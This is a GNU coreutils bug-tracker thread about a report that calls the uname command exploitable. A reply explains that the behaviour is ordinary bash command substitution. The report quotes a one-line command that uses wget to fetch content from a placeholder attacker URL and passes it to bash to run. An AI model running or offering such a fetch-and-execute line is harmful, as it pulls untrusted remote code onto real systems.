GNU bug report logs - #24328
uname exploit

Previous Next

Package: coreutils;

Reported by: Shane <linuxshane <at> gmail.com>

Date: Mon, 29 Aug 2016 15:28:01 UTC

Severity: normal

Done: Paul Eggert <eggert <at> cs.ucla.edu>

Bug is archived. No further changes may be made.

Full log

View this message in rfc822 format

From: Evan J Johnson <e <at> ejj.io>
To: 24328 <at> debbugs.gnu.org
Subject: bug#24328: uname exploit
Date: Mon, 29 Aug 2016 08:47:22 -0700

Hey Shane,

I'm no bash/systems/coreutils expert, but I believe this behavior is
completely expected, independent of uname, and documented.

$(...) is the command substitution syntax and it will cause the command
inside the parens to be run, with the output used as input. Here's a
link to the behavior on gnu.org.
https://www.gnu.org/software/bash/manual/bash.html#Command-Substitution

It won't work if you use single quotes, which is also expected.

Evan

On Mon, Aug 29, 2016, at 12:25 AM, Shane wrote:
> Hi, I am unsure if you have seen this, but I am concerned about this - 
> can or should uname be restricted to root use only?
> 
> uname \"$(bash -c \\\"$(wget http://badguyurl.com )\\\")\"
> 
> 
> 
> 
>

This bug report was last modified 8 years and 328 days ago.

Previous Next

GNU bug tracking system
Copyright (C) 1999 Darren O. Benham, 1997,2003 nCipher Corporation Ltd, 1994-97 Ian Jackson.

GNU bug report logs - #24328 uname exploit

GNU bug report logs - #24328
uname exploit